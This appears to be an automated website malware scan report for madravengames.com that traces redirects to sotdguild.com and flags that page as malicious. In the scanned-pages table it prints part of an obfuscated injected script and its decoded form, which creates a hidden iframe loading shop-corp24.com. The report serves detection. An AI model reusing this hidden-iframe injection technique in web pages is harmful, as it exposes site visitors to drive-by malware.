Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=madravengames.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ww35.btrsh.com
Result:
HTTP/1.1 500 Can't connect to ww35.btrsh.com:80
Content-Type: text/plain
GET / HTTP/1.1
Host: ww35.btrsh.com
Result:
HTTP/1.1 500 Can't connect to ww35.btrsh.com:80
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: ww35.btrsh.com
Referer: http://www.google.com/search?q=ww35.btrsh.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ww35.btrsh.com
Referer: http://www.google.com/search?q=ww35.btrsh.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://madravengames.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 12 Oct 2014 13:43:27 GMT Location: http://www.madravengames.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.madravengames.com/xmlrpc.php | clean |
http://www.madravengames.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 12 Oct 2014 13:43:28 GMT Location: http://www.sotdguild.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.madravengames.com/xmlrpc.php | malicious |
http://www.sotdguild.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 12 Oct 2014 13:43:32 GMT Location: http://sotdguild.com/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://sotdguild.com/xmlrpc.php | clean |
http://sotdguild.com/ | 200 OK Content-Length: 58220 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _01O='KkSKpcCfngCdpxGcz5yJlxWe0N3NywXe0lGbpJWazlmd3IDft92Y8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxnMk92afNna4IDfoRHZpdHfuVGZklGaBNDfkFWZoxXZtFmTnFGV5J0c05WZtVGbFRXZnxHewBDOxcjM8JXZyJXZmVmc8hHcwAjM3IDf0h2ZpVGa8VGchN2cl5Wd8VGdpJ3d8xmc1xHZh9Gbu92NywXZtFmcml2Nyw3bm5Wa8Rnbl1Wdj9GZENDfjJ3c0V2Z8t2b8VGd1JWayRHdBRXZzxnZlJHf05WZtV3YvRGOywndpR2NywnZpBjM8RWZkF2bsxHduVmdFh2YhRHdhx3ZhRldpRGMyw3dvRmbpdHOywHZh9Gb3IDfyQ2br91cqlDM8lGchlnclVXcqxnbvlGdj5WdmFEM8V2csFmZwIDfyFmdBB ...[4229 bytes skipped]... Decoded script: ...[14006 bytes skipped]... nload%27%2C%20showBrowVer%29%3B%0A%20%20%20%20%7D%0A%7D%0Afunction%20showBrowVer%28%29%0A%7B%0Avar%20divTag%3Ddocument.createElement%28%27div%27%29%3B%20%20%20%20%20%20%20%20%0AdivTag.id%3D%27dt%27%3B%0Adocument.body.appendChild%28divTag%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20var%20js_kod2%20%3D%20document.createElement%28%27iframe%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.src%20%3D%20%27http%3A//shop-corp24.com%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.width%20%3D%20%27180px%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20js_kod2.height%20%3D%20%27200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var _0OO=document.createElement('script');_0OO.src='http://jquery ...[1743 bytes skipped]... | ||
http://static.wowhead.com/widgets/power.js | 200 OK Content-Length: 33265 Content-Type: application/javascript | clean |
http://madravengames.com/./wowhead/js/armory.js.php | 404 Not Found Content-Length: 104 Content-Type: text/html | clean |
http://madravengames.com/test404page.js | 404 Not Found Content-Length: 104 Content-Type: text/html | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Sun, 12 Oct 2014 13:43:39 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_b Content-Length: 0 Set-Cookie: guest_id=v1%3A141312141932895182; Domain=.twitter.com; Path=/; Expires=Tue, 11-Oct-2016 13:43:39 UTC X-Connection-Hash: fd091c6f997ca66cad53b55fda4eb7d8 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 55717 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.41fdd97e68d79a7a9a7352be7b76341eb87caa31.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 56191 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.39a186d42f74a4c5332bc02964f0c677cc71ac35.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 56368 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/msa/init.ba313b6edd9be3027a42924204d7f32c7a40284f.js | 200 OK Content-Length: 302426 Content-Type: application/javascript | clean |
https://twitter.com/?lang=cs | 200 OK Content-Length: 56606 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/cs/init.24ebd30b5cd7103a744f5695d176a0ff3ecd6c70.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=da | 200 OK Content-Length: 56016 Content-Type: text/html | clean |